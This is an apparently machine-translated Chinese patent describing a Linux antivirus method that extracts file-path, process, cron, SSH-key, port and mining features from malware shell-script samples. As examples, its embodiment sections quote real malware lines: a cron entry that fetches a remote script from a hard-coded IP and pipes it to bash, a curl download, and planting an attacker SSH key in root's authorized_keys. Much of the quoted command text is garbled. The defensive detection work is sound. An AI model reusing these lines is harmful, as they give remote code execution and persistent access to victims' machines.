CN111723372B

CN111723372B - Virus checking and killing method and device and computer readable storage medium

Info

Publication number: CN111723372B
Application number: CN202010578310.7A
Authority: CN
Inventors: 范楷朋
Original assignee: Sangfor Technologies Co Ltd
Current assignee: Sangfor Technologies Co Ltd
Priority date: 2020-06-22
Filing date: 2020-06-22
Publication date: 2024-02-23
Anticipated expiration: 2040-06-22
Also published as: CN111723372A

Abstract

The invention discloses a virus searching and killing method, a device and a computer readable storage medium, wherein the virus searching and killing method comprises the following steps: acquiring a set of objects to be detected in equipment to be detected; matching the object set to be detected with a first feature item set to obtain a first matching result, wherein the first feature item set is generated based on a sample shell script corresponding to the virus; and when the first matching result is that the matching is successful, the virus exists in the equipment to be detected, and the virus in the equipment to be detected is cleared. According to the method, the object set to be detected is matched with the first characteristic item set generated based on the corresponding sample shell script of the virus, when the matching is successful, the virus in the equipment to be detected is cleared, the virus can be quickly and comprehensively found out by using the method, the accurate virus searching and killing is realized, and the technical problems that the virus is repeatedly infected and cannot be thoroughly searched and killed cleanly are effectively solved.

Description

Virus checking and killing method and device and computer readable storage medium

Technical Field

The present invention relates to the field of virus killing, and in particular, to a method and apparatus for virus killing, and a computer readable storage medium.

Background

The current method for searching and killing Linux viruses in the industry is static file scanning and killing, and the method mainly comprises the steps of carrying out characteristic scanning on ELF files and shell scripts in a device system to be detected, and isolating the files and processes if the ELF files and the shell scripts are malicious. However, most Linux viruses are shell scripts, the confusion is high, the virus killing engine is difficult to detect, and with the rise of a file-free mode, viruses can be subjected to persistent attack in other modes, so that even if the virus killing engine can kill virus files, the phenomenon of repeated infection of viruses can often occur, and thorough killing cannot be achieved.

The foregoing is provided merely for the purpose of facilitating understanding of the technical solutions of the present invention and is not intended to represent an admission that the foregoing is prior art.

Disclosure of Invention

The invention mainly aims to provide a virus checking and killing method, a virus checking and killing device and a computer readable storage medium, and aims to solve the technical problems that viruses are difficult to detect and durable attack is caused, so that the viruses are repeatedly infected and cannot be checked and killed thoroughly in the prior art.

In order to achieve the above object, the present invention provides a virus killing method, comprising the steps of:

acquiring a set of objects to be detected in equipment to be detected;

Matching the object set to be detected with a first feature item set to obtain a first matching result, wherein the first feature item set is generated based on a sample shell script corresponding to viruses;

and when the first matching result is that the matching is successful, confirming that viruses exist in the equipment to be detected, and clearing the viruses in the equipment to be detected.

Preferably, the first feature item set includes: virus file path characteristics;

before the collection of objects to be detected in the device to be detected is obtained, the virus killing method further comprises the following steps:

traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;

searching a first code segment with virus file path characteristics from the current sample shell script through a first regular expression;

extracting a first character string positioned behind a first preset identifier from the first code segment;

and obtaining virus file path characteristics based on the first character string, and adding the virus file path characteristics into a first characteristic item set.

Preferably, the deriving virus file path characteristics based on the first string includes,

Judging whether the first character string contains preset characters or not;

if the first character string contains the preset character, taking the first character string as a virus file path characteristic;

if the first character string does not contain the preset character, converting the first character string to obtain a converted first character string, and taking the converted first character string as a virus file path characteristic.

Preferably, the first feature item set includes: virus process name characteristics;

searching a second code segment with virus process name characteristics from the current sample shell script through a second regular expression;

extracting a second character string positioned behind a second preset mark from the second code segment;

and taking the extracted second character string as a virus process name characteristic, and adding the virus process name characteristic into the first characteristic item set.

Preferably, the first feature item set includes: timing task features;

searching a third code segment with timing task characteristics from the current sample shell script through a third regular expression;

extracting a third character string positioned between third preset identifiers from the third code segment;

and taking the extracted third character string as a timing task feature, and adding the timing task feature into the first feature item set.

Preferably, the first feature item set includes: network connection tool features;

searching a fourth code segment with network connection tool characteristics from the current sample shell script through a fourth regular expression;

extracting a fourth character string positioned between fourth preset identifiers from the fourth code segment;

and taking the extracted fourth character string as a network connection tool feature, and adding the network connection tool feature into the first feature item set.

Preferably, said matching of said set of objects to be detected with a first set of feature items comprises,

matching the object set to be detected with a configuration file, wherein the configuration file comprises a first characteristic item set and a second characteristic item set, the first characteristic item set is generated by codes for malicious behavior in a sample shell script, and the second characteristic item set is generated by codes for clearing other viruses in the sample shell script.

Preferably, the second set of feature items includes: the virus file name feature is used for clearing other viruses;

searching a fifth code segment with virus file name characteristics for clearing other viruses from the current sample shell script through a fifth regular expression;

extracting a fifth character string positioned after a fifth preset mark from the fifth code segment;

and taking the extracted fifth character string as a virus file name feature for clearing other viruses, and adding the virus file name feature for clearing other viruses into a second feature item set.

Preferably, the second set of feature items includes: the virus process name features are used for eliminating other viruses;

searching a sixth code segment with virus process name characteristics for clearing other viruses from the current sample shell script through a sixth regular expression;

extracting a sixth character string positioned after a sixth preset identifier from the sixth code segment;

and taking the extracted sixth character string as a virus process name feature for clearing other viruses, and adding the virus process name feature for clearing other viruses into a second feature item set.

Preferably, the second set of feature items includes: monitoring port characteristics;

searching a seventh code segment with a monitoring port characteristic from the current sample shell script through a seventh regular expression;

Extracting a seventh character string positioned after a seventh preset mark from the seventh code segment;

and obtaining a monitoring port feature based on the seventh character string, and adding the monitoring port feature into a second feature item set.

Preferably, the obtaining a listening port feature based on the seventh string includes,

judging whether the seventh character string is a preset normal service port or not;

and if not, taking the seventh character string as a monitoring port characteristic.

Preferably, the second set of feature items includes: communication tool features;

searching an eighth code segment with communication tool characteristics from the current sample shell script through an eighth regular expression;

and taking the eighth code segment as a communication tool feature, and adding the communication tool feature into a second feature item set.

Preferably, said removing of viruses from said device to be tested comprises,

and removing objects successfully matched with the first characteristic item set in the object set to be detected in the equipment to be detected.

Preferably, after traversing the sample shell script and taking the traversed sample shell script as the current sample shell script, the method comprises the steps of,

judging whether the current sample shell script is in an encrypted state or not;

and if the judgment result is that the current sample shell script is in the encrypted state, decrypting the current sample shell script.

In addition, in order to achieve the above object, the present invention also provides a virus killing device, including: the system comprises a memory, a processor and a virus killing program stored on the memory and capable of running on the processor, wherein the virus killing program is configured to realize the steps of the virus killing method.

In addition, in order to achieve the above object, the present invention also provides a computer-readable storage medium having stored thereon a virus killing program which, when executed by a processor, implements the steps of the virus killing method as described above.

According to the method, the object set to be detected is matched with the first characteristic item set generated based on the corresponding sample shell script of the virus, when the matching is successful, the virus in the equipment to be detected is cleared, the virus can be quickly and comprehensively found out by using the method, the accurate virus searching and killing is realized, and the technical problems that the virus is repeatedly infected and cannot be thoroughly searched and killed are effectively solved.

Drawings

FIG. 1 is a schematic diagram of a virus killing device in a hardware operating environment according to an embodiment of the present invention;

FIG. 2 is a flowchart of a first embodiment of a virus killing method according to the present invention;

FIG. 3 is a flowchart of a second embodiment of the virus killing method according to the present invention;

FIG. 4 is a flowchart of a third embodiment of a virus killing method according to the present invention;

FIG. 5 is a flowchart of a fourth embodiment of a virus killing method according to the present invention;

FIG. 6 is a flowchart of a fifth embodiment of a virus killing method according to the present invention;

FIG. 7 is a flowchart of a sixth embodiment of a virus killing method according to the present invention;

FIG. 8 is a flowchart of a seventh embodiment of a virus killing method according to the present invention;

FIG. 9 is a flowchart of an eighth embodiment of a virus killing method according to the present invention;

FIG. 10 is a flowchart of a method for virus killing according to a ninth embodiment of the present invention;

FIG. 11 is a flowchart of a tenth embodiment of a virus killing method according to the present invention;

the achievement of the objects, functional features and advantages of the present invention will be further described with reference to the accompanying drawings, in conjunction with the embodiments.

Detailed Description

It should be understood that the specific embodiments described herein are for purposes of illustration only and are not intended to limit the scope of the invention.

As shown in fig. 1, the virus killing apparatus may include: a processor 1001, such as a CPU, a communication bus 1002, a user interface 1003, a network interface 1004, and a memory 1005. Wherein the communication bus 1002 is used to enable connected communication between these components. The user interface 1003 may include a Display, an input unit such as a Keyboard (Keyboard), and the optional user interface 1003 may further include a standard wired interface, a wireless interface. The network interface 1004 may optionally include a standard wired interface, a wireless interface (e.g., WI-FI interface). The memory 1005 may be a high-speed RAM memory or a stable memory (non-volatile memory), such as a disk memory. The memory 1005 may also optionally be a storage device separate from the processor 1001 described above.

It will be appreciated by those skilled in the art that the structure shown in fig. 1 is not limiting and may include more or fewer components than shown, or may be combined with certain components, or a different arrangement of components.

As shown in fig. 1, an operating system, a network communication module, a user interface module, and a virus killing program may be included in a memory 1005, which is a type of computer storage medium.

In the virus killing apparatus shown in fig. 1, the network interface 1004 is mainly used for data communication with an external network; the user interface 1003 is mainly used for receiving an input instruction of a user; the virus killing apparatus calls a virus killing program stored in the memory 1005 through the processor 1001, and performs the following operations:

acquiring a set of objects to be detected in equipment to be detected;

Further, the first feature item set includes: virus file path characteristics; wherein, before the collection of objects to be detected in the device to be detected is obtained, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

Further, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

judging whether the first character string contains preset characters or not;

Further, the first feature item set includes: virus process name characteristics; wherein, before the collection of objects to be detected in the device to be detected is obtained, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

Further, the first feature item set includes: timing task features; wherein, before the collection of objects to be detected in the device to be detected is obtained, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

Further, the first feature item set includes: network connection tool features; wherein, before the collection of objects to be detected in the device to be detected is obtained, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

Further, the second set of feature items includes: the virus file name feature is used for clearing other viruses; wherein, before the collection of objects to be detected in the device to be detected is obtained, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

Further, the second set of feature items includes: the virus process name features are used for eliminating other viruses; wherein, before the collection of objects to be detected in the device to be detected is obtained, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

Further, the second set of feature items includes: monitoring port characteristics; wherein, before the collection of objects to be detected in the device to be detected is obtained, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

Further, the second set of feature items includes: communication tool features; wherein, before the collection of objects to be detected in the device to be detected is obtained, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

Further, after traversing the sample shell script and taking the traversed sample shell script as the current sample shell script, the processor 1001 may call the virus killing program stored in the memory 1005, and further perform the following operations:

According to the method, the virus in the equipment to be detected is cleared when the matching is successful by matching the set of the objects to be detected with the first characteristic item set generated based on the sample shell script corresponding to the virus, and the virus can be quickly and comprehensively found out by using the method, so that the accurate virus searching and killing is realized, and the technical problems that the virus is repeatedly infected and cannot be thoroughly searched and killed are effectively solved.

Based on the hardware structure, the embodiment of the virus searching and killing method is provided.

Referring to fig. 2, fig. 2 is a flow chart of a first embodiment of the virus killing method according to the present invention.

In a first embodiment, the virus killing method includes the steps of:

s10: acquiring a set of objects to be detected in equipment to be detected;

it can be understood that the device to be detected may be a device that needs to perform virus detection, especially a device that needs to perform Linux virus detection, where the device to be detected may be an electronic device such as a notebook computer, a desktop computer, a tablet computer, or a mobile phone, and the invention is not limited in particular, and any device that needs to perform virus detection may be used as the device to be detected in the present application.

The set of objects to be detected may comprise, for example, at least one of a process list and a timed task list of the device to be detected. In one embodiment, a ps-elf command and a crontab-l command may be used to obtain a process list and a timing task list, respectively, of the device to be detected.

S20: matching the object set to be detected with a first feature item set to obtain a first matching result, wherein the first feature item set is generated based on a sample shell script corresponding to viruses;

it should be appreciated that the first feature item set is generated for a virus-based corresponding sample shell script, and includes at least one of a virus file path feature, a virus process name feature, a timing task feature, and a network connection tool feature. And matching the object to be detected with the first characteristic item set, namely matching the objects in the object to be detected with the characteristics in the first characteristic item set in sequence, and generating a first matching result based on the matching.

The sample shell scripts corresponding to the viruses can be obtained based on a history database, that is, the sample shell scripts corresponding to the history viruses are stored in the history database, for example, in the history database, there may be a plurality of sample shell scripts corresponding to the viruses, for example, there may be 1000, 2000, etc., which is not particularly limited in the present invention, and is particularly related to the number of stored sample shell scripts.

S30: and when the first matching result is that the matching is successful, confirming that viruses exist in the equipment to be detected, and clearing the viruses in the equipment to be detected.

It can be understood that when the first matching result is that the matching is successful, it is determined that the virus exists in the device to be detected, and the virus in the device to be detected is removed. In a specific embodiment, the removing the virus in the device to be detected includes removing an object that is successfully matched with the first feature item set in the set of objects to be detected in the device to be detected.

Further, as shown in fig. 3, a second embodiment of the virus killing method according to the present invention is proposed based on the first embodiment, where in this embodiment, the first feature item set includes: virus file path characteristics;

Wherein, before step S10, the virus killing method further includes:

s101: traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;

it may be understood that the sample shell scripts corresponding to the viruses are stored in the history database, when the sample shell scripts in the history database need to be used, the sample shell scripts are traversed, the traversed sample shell scripts are used as current sample shell scripts, and in the following embodiment, in the process of constructing the first feature item set, the current sample shell scripts are operated.

S201: searching a first code segment with virus file path characteristics from the current sample shell script through a first regular expression;

it can be appreciated that after the current sample shell script is obtained, a first code segment is searched from the current sample shell script through a first regular expression, wherein virus file path characteristics exist in the first code segment. For example, the script downloads the virus file from the hacker server through a Curl/wget command, -o parameter representation is saved as a local path, so the virus file path feature is extracted by searching the first code segment containing the Curl or wget string, and then intercepting the string following-o. Specifically, a first code segment with a current character string of the current sample shell can be searched for through a first regular expression, and the obtained first code segment is, for example: curl-fssl http: /(thyrsi.com/t 6/672/1550667479X 1822611209. Jpg-o) /tmp/watchdogs。

S301: extracting a first character string positioned behind a first preset identifier from the first code segment;

after obtaining the first code segment based on the first regular expression, extracting a first character string located after the first preset identifier from the first code segment, and continuing the above embodiment, where the obtained first code segment is: curl-fssl http: /(thyrsi.com/t 6/672/1550667479X 1822611209. Jpg-o)/tmp/watchdogs. Extracting a first character string with a first preset identifier to obtain/tmp/watchdogsThat is, in this embodiment, the first preset identifier is-o, and the extracted first character string is/tmp/watchdogs。

S401: and obtaining virus file path characteristics based on the first character string, and adding the virus file path characteristics into a first characteristic item set.

It should be appreciated that after the first string is obtained, a virus file path feature is obtained based on the first string, and the virus file path feature is added to a first feature item set to form a portion of the first feature item set.

Further, the deriving virus file path characteristics based on the first string includes,

judging whether the first character string contains preset characters or not;

It can be understood that after the first character string is obtained, it is first determined whether the first character string contains a preset character, and if the first character string contains the preset character, the first character string is directly used as the path feature of the virus file. Continuing with the above embodiment, for example, the preset character is set to/, and the obtained first character string is/tmp/watchdogsThe first character string can be seen to contain the preset character, so that the obtained first character string can be directly used as the path characteristic of the virus file.

When the first character string does not include the preset character, converting the obtained first character string, and taking the converted first character string as a virus file path characteristic.

The converted first character string is taken as the path characteristics of the virus file to be specifically divided into two cases:

first case: the first string does not include $, for example, the obtained first string is mspi139f, and at this time, the command of switching the directory by searching up the cd command is needed, and the/tmp/mspi 139f is spliced and used as the path feature of the virus file.

Second case: the first string includes $, for example, the first string is $cron, and the string 'cron=xxx' needs to be searched upwards to obtain cron=/lib 64/libgc++ so, and at this time, the string is used as the virus file path feature.

Further, after step S101, the virus killing method further includes:

In this embodiment, after a current sample shell script is obtained, whether the current sample shell script is in an encrypted state is first determined, if the determination result indicates that the current sample shell script is in the encrypted state, the current sample shell script is decrypted first, and then a step of determining a code segment from the current sample shell script based on a regular expression is executed; and if the judgment result shows that the current sample shell script is not in an encrypted state, directly executing the step of determining the code segment from the current sample shell script based on the regular expression.

Further, as shown in fig. 4, a third embodiment of the virus killing method according to the present invention is provided based on the first embodiment, where in this embodiment, the first feature item set includes: virus process name characteristics;

Wherein, before step S10, the virus killing method further includes:

s102: traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;

S202: searching a second code segment with virus process name characteristics from the current sample shell script through a second regular expression;

it can be appreciated that after the current sample shell script is obtained, a second code segment is searched from the current sample shell script through a second regular expression, wherein a virus process name feature exists in the second code segment. For example, the function of the nohup command is background running process, and basically viruses start the process in this way, so that the corresponding virus process name feature can be obtained by searching the second code segment containing the nohup character string and then intercepting the second character string of the face after the second preset identifier. Specifically, a second code segment with a nohup character string can be searched from the current sample shell script through a second regular expression, and specifically, the obtained second code segment is, for example: nohup/lib64/launch update.

For another example, to run the virus process, executable rights (x) must be added to the file, so by searching for a second code segment containing chmod+x strings, and then intercepting the second string on the face after the second preset identifier, the corresponding virus process name feature can be obtained. Specifically, a second code segment with a chmod+x character string can be searched from the current sample shell script through a second regular expression, and specifically, the obtained second code segment is: chmod+x mspi139f.

S302: extracting a second character string positioned behind a second preset mark from the second code segment;

it may be appreciated that, after obtaining the second code segment based on the second regular expression, a second string located after the second preset identifier is further extracted from the second code segment, and the above embodiment is continued, where the obtained second code segment is: when the nohup/lib64/launch update is performed, extracting a second character string after a second preset identifier to obtain a launch update, that is, in this embodiment, the second preset identifier is the last one/, and the extracted second character string is the launch update.

When the obtained second code segment is: when chmod+xmspi 139f, extracting a second string after a second preset identifier to obtain mspi139f, that is, in this embodiment, the second preset identifier is chmod+x, and the extracted second string is mspi139f.

S402: and taking the extracted second character string as a virus process name characteristic, and adding the virus process name characteristic into the first characteristic item set.

It should be appreciated that after the second string is obtained, the extracted second string is used as a virus process name feature and the virus process name feature is added to a first feature item set to form a portion of the first feature item set.

Further, as shown in fig. 5, a fourth embodiment of the virus killing method according to the present invention is provided based on the first embodiment, where in this embodiment, the first feature item set includes: timing task features;

wherein, before step S10, the virus killing method further includes:

s103: traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;

S203: searching a third code segment with timing task characteristics from the current sample shell script through a third regular expression;

it may be appreciated that after the current sample shell script is obtained, a third code segment is searched for from the current sample shell script through a third regular expression, where a timing task feature exists in the third code segment. For example, a third code segment is found by the third regular expression ' echo ' +/var/spool/cron/+ ', ' echo ' + >/etc/cron.d/+ ' or ' echo ' + |+ crontab- ', and then intercepting a third character string positioned between third preset identifiers to obtain corresponding timing task characteristics. Specifically, the third code segment searched from the current sample shell script by ' echo ' + >/var/spool/cron/+ ', ' echo ' + >/etc/cron.d/+ ' or ' echo ' + crontab- ' is echo-e/1 x root (current-s http://107.189.11.170/2start.jpg// wget-q-o-http://107.189.11.170/2 start.jpg) |bash-sh\n# ">/etc/cron.d/root).

S303: extracting a third character string positioned between third preset identifiers from the third code segment;

it may be appreciated that after obtaining the third code segment based on the third regular expression, a third string located between third preset identifiers is further extracted from the third code segment, and the above embodiment is continued, where the obtained third code segment is: and (3) when echo-e/1 is detected, extracting a third character string positioned between third preset identifiers to obtain 1 x/1 x root (cube-s http://107.189.11.170/2start. Jpg// wget-q-http #:// 107.189.11.170/2start. Jpg) |bash-n#, namely in the embodiment, the third preset identifier is ">/1 x root (cube-s http://107.189.11.170/2start. Jpg// wget-q-http #// 107.189.11.170/2start. Jpg), and extracting the third character string to obtain 23 x/1 x root.

S403: and taking the extracted third character string as a timing task feature, and adding the timing task feature into the first feature item set.

It should be appreciated that after the third string is obtained, the extracted third string is used as a timed task feature and the timed task feature is added to the first set of feature items to form a portion of the first set of feature items.

Further, as shown in fig. 6, a fifth embodiment of the virus killing method according to the present invention is provided based on the first embodiment, where in the present embodiment, the first feature item set includes: network connection tool features;

wherein, before step S10, the virus killing method further includes:

s104: traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;

S204: searching a fourth code segment with network connection tool characteristics from the current sample shell script through a fourth regular expression;

it may be appreciated that after the current sample shell script is obtained, a fourth code segment is searched for from the current sample shell script through a fourth regular expression, where a network connection tool feature exists in the fourth code segment. For example, searching a fourth code segment through a fourth regular expression 'echo/+ >/root/. Ssh/authorized_keys', and then intercepting a fourth character string located between fourth preset identifiers to obtain the corresponding network connection tool feature. Specifically, the fourth code segment looked up from the current sample shell script by 'echo + >/root/. Ssh/authorized_keys' is echo "ssh-rsaAAAAB3NzaC1yc2EAAAABIwAAAQEAv54 nGwGwm 626zrsUeI0 bnVygjs/ux 7v5phk1bZYFHEm+3Aa0gfu5 EQydnTp 01abaKxWJ97 mM5a2 VAfTN+n6KUwYRzPaDKK HNUW7E" >/root/. Ssh/authorized_keys.

S304: extracting a fourth character string positioned between fourth preset identifiers from the fourth code segment;

it may be appreciated that, after the fourth code segment is obtained based on the fourth regular expression, a fourth character string located between fourth preset identifiers is further extracted from the fourth code segment, and the above embodiment is continued, where the obtained fourth code segment is: when echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAv54 nGwGwm 626zrsUeI0bnVygjgs/ux7v5phk bZYFHEm+3Aa0gfu5EQyQdnhTp01abaKxWJ97mrM5a2VAfTN+n6KUwNYRZpaDKIUwnHNUSW7E" >/root/. Ssh/authorized_key, extracting the fourth string between the fourth preset identifications to obtain ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAv54nAGwGwm626zrsUeI0bnVygjgs/ux7v5phk bZYFHEm+3Aa0gfu5 EQdnhTp 01 abaKxJ97 mrM5a2VAfTN+n6KuwNYRZpa IUWInkUSW7E, that is, in this embodiment, the fourth predetermined identifier is "", and the extracted fourth character string is ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAv54nAGwGwm626zrsUeI0bnVygjgs/ux7v5phk1bZYFHEm+3Aa0 EQdnhTp 01abaKxWJ97 mM5a2 VAfTN+n6KUwYRZPaDKIUHNUSW7E.

S404: and taking the extracted fourth character string as a network connection tool feature, and adding the network connection tool feature into the first feature item set.

It should be appreciated that after the fourth string is obtained, the extracted fourth string is used as a network connection tool feature and the network connection tool feature is added to the first feature set to form a portion of the first feature set.

Further, as shown in fig. 7, a sixth embodiment of the virus killing method according to the present invention is proposed based on the first embodiment, in which step S20 includes,

s20' matches the object set to be detected with a configuration file, wherein the configuration file comprises a first feature item set and a second feature item set, the first feature item set is generated by codes for malicious behavior in a sample shell script, and the second feature item set is generated by codes for clearing other viruses in the sample shell script.

It can be understood that, in order to more comprehensively detect viruses in the device to be detected, the set of objects to be detected can be matched with a configuration file, and the configuration file not only includes the first feature item set but also includes the second feature item set, so that the matching range of the objects to be detected in the device to be detected is enlarged, and viruses in the device to be detected can be more comprehensively searched. The first characteristic item set is generated by codes for malicious behavior in the sample shell script, and the second characteristic item set is generated by codes for clearing other viruses in the sample shell script.

It can be understood that, in general, a sample shell script of a certain virus (hereinafter referred to as a first virus) includes two major portions of codes, where the first major portion of codes are codes for performing malicious behaviors, and specifically refers to codes for performing malicious behaviors by the first virus; the second most codes are codes for clearing other viruses, and because viruses are mutually exclusive, codes for clearing other viruses are also arranged in the sample shell script of the first virus, and characteristic items related to other viruses except the first virus can be acquired from the codes for clearing other viruses, and a set formed by the characteristic items is called a second characteristic item set.

The second feature item set includes at least one of a virus file name feature for clearing other viruses, a virus process name feature for clearing other viruses, a listening port feature, and a communication tool feature.

Further, as shown in fig. 8, a seventh embodiment of the virus killing method according to the present invention is proposed based on the first embodiment, and in this embodiment, the second feature item set includes: the virus file name feature is used for clearing other viruses;

wherein, before step S10, the virus killing method further includes:

S105: traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;

it can be understood that the sample shell scripts corresponding to the viruses are stored in the history database, when the sample shell scripts in the history database need to be used, the sample shell scripts are traversed, the traversed sample shell scripts are used as current sample shell scripts, and in the following embodiment, in the process of constructing the second feature item set, the current sample shell scripts are operated.

S205: searching a fifth code segment with virus file name characteristics for clearing other viruses from the current sample shell script through a fifth regular expression;

it can be appreciated that after the current sample shell script is obtained, a fifth code segment is searched from the current sample shell script through a fifth regular expression, wherein virus file name features for clearing other viruses exist in the fifth code segment. For example, searching a fifth code segment through a fifth regular expression ' rm-rf ' + ' and then intercepting a fifth character string positioned after a fifth preset identifier to obtain a corresponding virus file name feature for clearing other viruses. Specifically, the fifth code segment that is looked up from the current sample shell script by 'rm-rf +', is rm-rf/usr/bin/config.

S305: extracting a fifth character string positioned after a fifth preset mark from the fifth code segment;

it may be appreciated that, after obtaining the fifth code segment based on the fifth regular expression, a fifth string located after the fifth preset identifier is further extracted from the fifth code segment, and the above embodiment is continued, where the obtained fifth code segment is: and when rm-rf/usr/bin/config. Json, extracting a fifth character string positioned after a fifth preset mark to obtain/usr/bin/config. Json, namely, in the embodiment, the fifth preset mark is-rf, and the extracted fifth character string is/usr/bin/config. Json.

S405: and taking the extracted fifth character string as a virus file name feature for clearing other viruses, and adding the virus file name feature for clearing other viruses into a second feature item set.

It should be appreciated that after the fifth string is obtained, the extracted fifth string is used as a virus filename feature for removing other viruses, and the virus filename feature for removing other viruses is added to a second feature item set to form a part of the second feature item set.

Further, as shown in fig. 9, an eighth embodiment of the virus killing method according to the present invention is provided based on the first embodiment, and in this embodiment, the second feature item set includes: the virus process name features are used for eliminating other viruses;

wherein, before step S10, the virus killing method further includes:

s106: traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;

S206: searching a sixth code segment with virus process name characteristics for clearing other viruses from the current sample shell script through a sixth regular expression;

it may be appreciated that after the current sample shell script is obtained, a sixth code segment is searched from the current sample shell script through a sixth regular expression, where a virus process name feature for clearing other viruses exists in the sixth code segment. For example, searching a sixth code segment through a sixth regular expression 'ps.++ |+xargs kill', and then intercepting a sixth character string located after a sixth preset identifier to obtain a corresponding virus process name feature for removing other viruses. Specifically, the sixth code segment that is looked up from the current sample shell script by 'ps++ |+ xargs kill' is ps auxf grep hwlh3wlh lh|awk '{ print $2}' |xargs kill-9.

S306: extracting a sixth character string positioned after a sixth preset identifier from the sixth code segment;

it may be appreciated that, after obtaining the sixth code segment based on the sixth regular expression, a sixth string located after the sixth preset identifier is further extracted from the sixth code segment, and the above embodiment is continued, where the obtained sixth code segment is: when ps auxf grep hwlh3wlh lh|awk '{ print $2}' |xargs kill-9, extracting a sixth character string located after a sixth preset identifier to obtain hwlh3wlh lh, that is, in this embodiment, the sixth preset identifier is grep, and the extracted sixth character string is hwlh3wlh lh.

S406: and taking the extracted sixth character string as a virus process name feature for clearing other viruses, and adding the virus process name feature for clearing other viruses into a second feature item set.

It should be appreciated that, after the sixth string is obtained, the extracted sixth string is used as a virus process name feature for removing other viruses, and the virus process name feature for removing other viruses is added to a second feature item set to form a part of the second feature item set.

Further, as shown in fig. 10, a ninth embodiment of the virus killing method according to the present invention is provided based on the first embodiment, and in this embodiment, the second feature item set includes: monitoring port characteristics;

wherein, before step S10, the virus killing method further includes:

s107: traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;

S207: searching a seventh code segment with a monitoring port characteristic from the current sample shell script through a seventh regular expression;

it may be appreciated that after the current sample shell script is obtained, a seventh code segment is searched for from the current sample shell script through a seventh regular expression, where a listening port feature exists in the seventh code segment. For example, a seventh regular expression 'netstat++ xargs. + kill' is used to find a seventh code segment, and then a seventh string located after the seventh preset identifier is intercepted, so that the corresponding listening port feature can be obtained. Specifically, the seventh code segment looked up from the current sample shell script through 'netstat++ |xargs. + kill' is netstat-anp |grep:443|awk '{ print $7}' |awk-F '[/] "{ print $1}' |xargs-1% kill-9%.

S307: extracting a seventh character string positioned after a seventh preset mark from the seventh code segment;

it may be appreciated that, after obtaining the seventh code segment based on the seventh regular expression, a seventh string located after the seventh preset identifier is further extracted from the seventh code segment, and the above embodiment is continued, where the seventh code segment is obtained: when the net stat-anp |grep is 443|awk '{ print $7}' |awk-F '[/] "{ print $1}' |xargs-1% kill-9%, extracting a seventh character string located after a seventh preset identifier to obtain 443, i.e. in the embodiment, the seventh preset identifier is grep, and the extracted seventh character string is 443.

S407: and obtaining a monitoring port feature based on the seventh character string, and adding the monitoring port feature into a second feature item set.

It should be appreciated that after the seventh string is derived, a snoop port feature is derived based on the seventh string, and the snoop port feature is added to the second feature item set to form a portion of the second feature item set.

Further, the deriving a listening port feature based on the seventh string includes,

It can be understood that after the seventh string is obtained, it is first determined whether the seventh string is a preset normal service port, if so, the seventh string is not used as a monitoring port feature, so that the port represented by the seventh string can work normally. If the port is not the preset normal service port, the port is possibly the port for communication between the virus and the outside, and the seventh character string is used as the monitoring port characteristic. Continuing with the above embodiment, for example, the preset normal service port is 23, and the obtained seventh string is 443, it can be seen that the seventh string is not the preset normal service port, and therefore, the seventh string can be used as a listening port feature.

Further, as shown in fig. 11, a tenth embodiment of the virus killing method according to the present invention is provided based on the first embodiment, and in this embodiment, the second feature item set includes: communication tool features;

wherein, before step S10, the virus killing method further includes:

s108: traversing the sample shell script, and taking the traversed sample shell script as a current sample shell script;

S208: searching an eighth code segment with communication tool characteristics from the current sample shell script through an eighth regular expression;

it may be appreciated that after the current sample shell script is obtained, an eighth code segment is searched for from the current sample shell script through an eighth regular expression, where a communication tool feature exists in the eighth code segment. For example, the corresponding communication tool feature can be obtained by searching the eighth code segment through the eighth regular expression' [ a-zA-Z0-9] {1,20} -. Specifically, the eighth code segment searched from the current sample shell script by 'a-zA-Z0-9 ] {1,20} - [ a-zA-Z0-9] {1,20}' is mine. Moneropool.

S308: and taking the eighth code segment as a communication tool feature, and adding the communication tool feature into a second feature item set.

It will be appreciated that after the eighth code segment is obtained, the extracted eighth code segment is used as a communication tool feature and the communication tool feature is added to a second feature set to form a portion of the second feature set.

In addition, the embodiment of the invention also provides a computer readable storage medium, wherein the computer readable storage medium stores a virus killing program, and the virus killing program realizes the following operations when being executed by a processor:

acquiring a set of objects to be detected in equipment to be detected;

Further, the first feature item set includes: virus file path characteristics; before the collection of objects to be detected in the device to be detected is obtained, the virus killing program when executed by the processor further realizes the following operations:

Further, the virus killing program when executed by the processor further realizes the following operations:

judging whether the first character string contains preset characters or not;

Further, the first feature item set includes: virus process name characteristics; before the collection of objects to be detected in the device to be detected is obtained, the virus killing program when executed by the processor further realizes the following operations:

Further, the first feature item set includes: timing task features; before the collection of objects to be detected in the device to be detected is obtained, the virus killing program when executed by the processor further realizes the following operations:

Further, the first feature item set includes: network connection tool features; before the collection of objects to be detected in the device to be detected is obtained, the virus killing program when executed by the processor further realizes the following operations:

Further, the second set of feature items includes: the virus file name feature is used for clearing other viruses; before the collection of objects to be detected in the device to be detected is obtained, the virus killing program when executed by the processor further realizes the following operations:

Further, the second set of feature items includes: the virus process name features are used for eliminating other viruses; before the collection of objects to be detected in the device to be detected is obtained, the virus killing program when executed by the processor further realizes the following operations:

Further, the second set of feature items includes: monitoring port characteristics; before the collection of objects to be detected in the device to be detected is obtained, the virus killing program when executed by the processor further realizes the following operations:

Further, the second set of feature items includes: communication tool features; before the collection of objects to be detected in the device to be detected is obtained, the virus killing program when executed by the processor further realizes the following operations:

